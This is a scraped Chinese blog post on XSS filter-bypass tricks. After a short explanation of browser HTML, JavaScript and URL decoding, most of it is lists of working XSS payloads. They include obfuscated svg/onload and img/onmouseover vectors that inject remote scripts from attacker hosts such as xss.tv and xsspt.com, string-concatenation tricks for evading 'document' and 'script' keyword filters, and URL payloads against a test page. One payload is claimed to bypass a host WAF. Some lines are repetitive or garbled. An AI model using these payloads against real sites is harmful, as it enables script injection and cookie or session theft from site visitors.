2. 程式人生 > >【奇淫巧技】XSS繞過技巧

【奇淫巧技】XSS繞過技巧

阿新 發佈:2018-06-07
var In on() inpu 失敗 pts IT 整理 tps

  聲明一下:各位大佬不要問我htmlspecialchars怎麽繞過,這個函數本身就是用來防禦xss攻擊的,確實在某些情況下由於開發者的疏忽導致這個函數不起作用(不算繞過),這個有興趣的可以自行百度,這裏不做解釋。

  1、首先是彈窗函數:

alert(1)
prompt(1)
confirm(1)
eval(

  2、然後是字符的編碼和瀏覽器的解析機制:

    要講編碼繞過,首先我們要理解瀏覽器的解析過程,瀏覽器在解析HTML文檔時無論按照什麽順序,主要有三個過程:HTML解析、JS解析和URL解析,每個解析器負責HTML文檔中各自對應部分的解析工作。

    首先瀏覽器接收到一個HTML文檔時,會觸發HTML解析器對HTML文檔進行詞法解析,這一過程完成HTML解碼並創建DOM樹,接下來JavaScript解析器會介入對內聯腳本進行解析,這一過程完成JS的解碼工作,如果瀏覽器遇到需要URL的上下文環境,這時URL解析器也會介入完成URL的解碼工作,URL解析器的解碼順序會根據URL所在位置不同,可能在JavaScript解析器之前或之後解析。

    三個解析過程所對應的字符編碼分別為:HTML解析 => HTML實體編碼 、JS解析 => Unicode編碼 、URL解析 =>URL編碼。

  3、下面我們用實際例子來解釋一下以上所說的瀏覽器解析過程和字符編碼是怎麽回事,以及今天的重點---XSS繞過。

....暫定

<a href=javascript:alert`1`>click
<button ‘ onclick=alert(1)//>
<button onfocus=alert`122`>
<object data=javascript:alert`1`>
<
 
body/onfocus=alert`9989`>
<input/onfocus=alert`1`>
<svg><script xlink:href=data:,alert(1) />
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg/onload=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!
<i contenteditable onblur
 
=alert(1)>lose focus!//contenteditable:使可編輯
<x oncontextmenu=alert(1)>right click this!
<c oncontextmenu=alert(1)>鼠標右鍵點擊
<iframe src="&Tab;javascript:prompt(1)&Tab;">
<ScRipT 1>prompt(1)</ScRipT 123
<input/onfocus=ev\u0061l(\u0061lert(1))>
<input/onfocus=\u0061lert(1)>
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<details ontoggle=alert(1)>
<iframe/src=‘data:text/html,<svg &#111;&#110;load=alert(1)>‘>

<div onscroll=alert`1`>

利用代碼:

<img/src=1 onmouseover=s=createElement(‘\163\143\162\151\160\164‘);body.appendChild(s);s.src="//xss.tv">

一下是一位大佬的文章,這裏直接引用了,有空再整理。

https://bbs.ichunqiu.com/thread-31886-1-1.html

這裏的連接字符,我研究出來一些payload,能夠script,document等危險字符過濾的情況下,不需要在任何編碼的情況下,去構造一個payload

當document被過濾的情況下,又不能用編碼
+被過濾,又不能編碼
<svg/onload="[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement(‘script‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom%27|e|%27nt`);;body.appendChild(createElement(‘script‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom%27%2Be%2B%27nt`);;body.appendChild(createElement(‘script‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘+e+‘nt`);;body.appendChild(createElement(‘script‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘-e-‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘*e*‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘/e/‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘%e%‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘^e^‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘>e>‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<svg/onload="[1].find(function(){with(`docom‘<e<‘nt`);;body.appendChild(createElement(‘\163\143\162\151\160\164‘)).src=‘http://xss.tv/XA‘})">

<script type="text/javascript">
  var a = ‘‘>=alert``<=‘‘;
  var a = ‘‘+alert``+‘‘;
</script>

<keygen autofocus onfocus=s=createElement("scriPt");body.appendChild(s);s.src="//xsspt.com/JUvhKT">支持火狐 360, 谷歌失敗,過主機衛士



就是下面這些連接符號

輸出在script內字符串位置的情況
如果允許閉合字符串,直接閉合並寫入javascript即可,如: 
http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘|alert(1)|‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=%27%2Balert(1)%2B%27
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘+alert(1)+‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘-alert(1)-‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘*alert(1)*‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘/alert(1)/‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘%alert(1)%‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘^alert(1)^‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘>alert(1)>‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘<alert(1)<‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘>=alert(1)>=‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘<=alert(1)<=‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘==alert(1)==‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘===alert(1)===‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘!=alert(1)!=‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘!==alert(1)!==‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘%26alert(1)%26‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘&alert(1)&‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘|alert(1)|‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘||alert(1)||‘
http://t.mhz.pw/game/xss/scriptstr.php?xss=‘>=alert(1)<=‘



<svg/onload="[1].find(function(){with(`docom‘|e|‘nt`);;body.appendChild(createElement(‘script‘)).src=‘http://xss.tv/XA‘})">

<svg/onload=[1].find(function(){with(/do/.source+/cument/.source)body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

<svg/onload=[1].find(function(){with(/docomen/.source+/t/.source);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

<svg/onload=[1].find(function(){with(`/docomen/.source+/t/.source`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

<svg/onload=[1].find(function(){with(`/docomen/.1+/t/.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

/字符/.1+/字符/.1
字符加上字符
//.1 + //.1  這些只是連接字符的方式而已 ,總結起來就是 document而已


<svg/onload=[1].find(function(){with(`\docomen\.1+\t\.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/ 換成 \ 也可以


<svg/onload=[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
不要加號也可以


<svg/onload=[1].find(function(){with(`=docomen=.1+=t=.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/換成=號也可以

<svg/onload=[1].find(function(){with(`=docomen=.1=t=.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
不要加號也可以


<svg/onload=[1].find(function(){with(`^docomen^.1+^t^.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/換成^號也可以

<svg/onload=[1].find(function(){with(`^docomen^.1^t^.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>



<svg/onload=[1].find(function(){with(`|docomen|.1+|t|.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/換成|號也可以

<svg/onload=[1].find(function(){with(`|docomen|.1|t|.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>



<svg/onload=[1].find(function(){with(`&docomen&.1+&t&.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/換成&號也可以
<svg/onload=[1].find(function(){with(`&docomen&.1&t&.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>


<svg/onload=[1].find(function(){with(`%26docomen%26.1+$26t%26.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/換成%26也行


<svg/onload=[1].find(function(){with(`%26docomen%26.1$26t%26.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
不要引號也行

Body加上括號也行
<svg/onload=[1].find(function(){with(`docomen`);(body.appendChild(createElement(‘script‘))).src=‘http://xss.tv/XA‘})>


<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,102,98,105,115,98,46,99,111,109,47,48,71,73,103,62,60,47,115,99,114,105,112,116,62))> 



<svg/onload=[1].find(function(){with(‘docu‘===‘ment‘);body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

【奇淫巧技】XSS繞過技巧

相關推薦

XSS繞過技巧

var In on() inpu 失敗 pts IT 整理 tps   聲明一下:各位大佬不要問我htmlspecialchars怎麽繞過,這個函數本身就是用來防禦xss攻擊的,確實在某些情況下由於開發者的疏忽導致這個函數不起作用(不算繞過),這個有興趣的可以自行百度,這裏

Bypass阿里雲注入

序言 我:摸魚一時爽,一直摸魚一時爽啊:relieved:大佬:還摸魚,快來搞個注入。我:。。。 拿到資料包 GET /wxapp.php?i=undefined&t=undefined&v=undefined&from=wxapp&c=entry&a=wxapp&a

C#冷知識系列(一)那些你知道或者不知道的

愛的 讓我 同事 orm lec 工程師 能夠 代碼 優勢 引子 正如我在個人介紹中所寫,我是一個仍然堅持.NET的頭鐵高級軟件工程師,研究C#,.NET已經六年多,一直堅持認為自己的能力不足以教授別人,所以一直沒有想法寫博客。工作幾年,內容涵蓋了.NET框架下的各種軟件的

幾個Linux命令及指令碼使用中的

例項1.建立一個別名,刪除原始檔案,同時在使用者的home目錄下backup中儲存副本。 #/bin/bash cp [email protected] ~/backup && rm -rf [email protected] 例項2.For

--vim的多行替換

場景 我想把 for a,b in zip( c, d, e ): f g 替換為 def func( para = e ) 只需要再vim中執行 s/\vfor a.*zip\(\_.{-}d,\n\s*(\_.{-})\):\_.{-}g/d

scala

收集了下scala的自己遇到過的下劃線 _ 的使用場景 好像還有在泛型還是定界延續的時候用到,後續補充 1.初始化的時候 object Sample { var name:String=_ d

之 Gson

SerializedName 註解 最近Gson用的比較多,用的時候一直有一個疑問,難道本地的實體類的屬性名一定要和Json的鍵一一對應嗎? 註解了@SerializedName的欄位會被序列化到JSON中,輸出的JSON格式中的名字即為註解時給定的名

技巧圖片偽裝大法--偽裝可執行文

style sys alt user var main image 可執行文件 打開 能夠將可執行文件偽裝成圖片 用到的工具: kali 2.0、msfasploit、Resource Hacker 首先利用msfvenom生成一個powershell的ps1文件

技巧C++理解繼承+結構體封裝 好題 Gym

題目連結 比賽連結 題意:給定n個表示式,m個判斷,每次有A is B,A has B 會有 A is B,B is C = A is C A has B,b has c ,A

安全牛學習筆記XSS的簡述

cookie 服務器 漏洞 安全 xss 1.Cross Site SCripting 攻擊者往Web頁面裏插入惡意Script代碼,當用戶瀏覽該頁時,嵌入其中Web裏面的Script代碼會被執行,從而達到惡意攻擊用戶的目的。

安全牛學習筆記XSS的利用

xss 惡意代碼 漏洞 反射型XSS1.概念 通過社會工程學等手段誘騙用戶點擊某個精心構造的鏈接,該鏈接會將惡意的js代碼提交給 有漏洞的服務器網站,並由服務器返回給受害者的客戶端執行。 2.POC -<scri

安全牛學習筆記XSS-簡介、跨站腳本檢測和常見的攻擊利用手段

信息安全 security+ xss XSS攻擊WEB客戶端客戶端腳本語言 彈窗警告、廣告 Javascript 在瀏覽器中執行XSS(cross-site scripting) 通過WEB站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端的攻擊目的 註入客戶端腳本代碼

安全牛學習筆記XSS- 鍵盤記錄器和反射型XSS

信息安全 security+ xss ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃XSS

安全牛學習筆記XSS-簡介、跨站腳本檢測和常見的攻擊利用手段2

信息安全 security+ xss ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋┃XSS ┃┃攻擊WEB客戶端

安全牛學習筆記XSS- 鍵盤記錄器和反射型XSS

XSS                         Keylogger.js  document.onkeypress = function(evt){      evt = evt || window.event     key = String.from

思妙想,如何給閘道器設計一款專屬的許可權控制責任鏈設計模式

什麼是責任鏈模式 客戶端發出一個請求,鏈上的物件都有機會來處理這一請求,而客戶端不需要知道誰是具體的處理物件。這樣就實現了請求者

深入淺出jQuery原始碼淺析2--

原文:http://www.cnblogs.com/coco1s/p/5303041.html 最近一直在研讀 jQuery 原始碼,初看原始碼一頭霧水毫無頭緒,真正靜下心來細看寫的真是精妙,讓你感嘆程式碼之美。 其結構明晰,高內聚、低耦合,兼具優秀的效能與便利的擴充套件性,在瀏覽器的相容性

CSS進階box-shadow 與 filter:drop-shadow 詳解及

box-shadow 在前端的 CSS 編寫工作想必十分常見。但是 box-shadow 除去它的常規用法,其實還存在許多不為人知的奇技淫巧。 box-shadow 常規用法 說到 box-shadow ,首先想到的必然是它能夠生成陰影,所以稱之為 shaodow ,簡單看看它的語法:

數學一個:如果用一枚硬幣生成任意概率——比如1/π?

剛才舍友拿Matrix67部落格裡的一個問題來考我——如果用一枚硬幣產生1/π的概率,沒想出來怎麼做,看了下解答感覺非常簡單而且巧妙。 Matrix67原部落格裡的文章——26 個比較概率大小的問題,這個問題是其中第15個問題的一小部分 一枚

SQL(01):給查出的資料排序編個號row_number() over(order by c)(mysql,db2,oracle,sqlserver通用)

我們天天都在跟資料庫打交道,寫下的程式碼不計其數,寫下的SQL更是可以繞地球幾圈。這裡收集關於SQL的神奇語法及用法,雖然你可能沒有用過,但這些SQL卻可以在關鍵的時候,派上用場。 我對SQL語句的理解,可以比作一座橋樑,將零散的資料組合起來,拿到我所需要的有效資訊。也以此記錄一下使用心得 一. 語法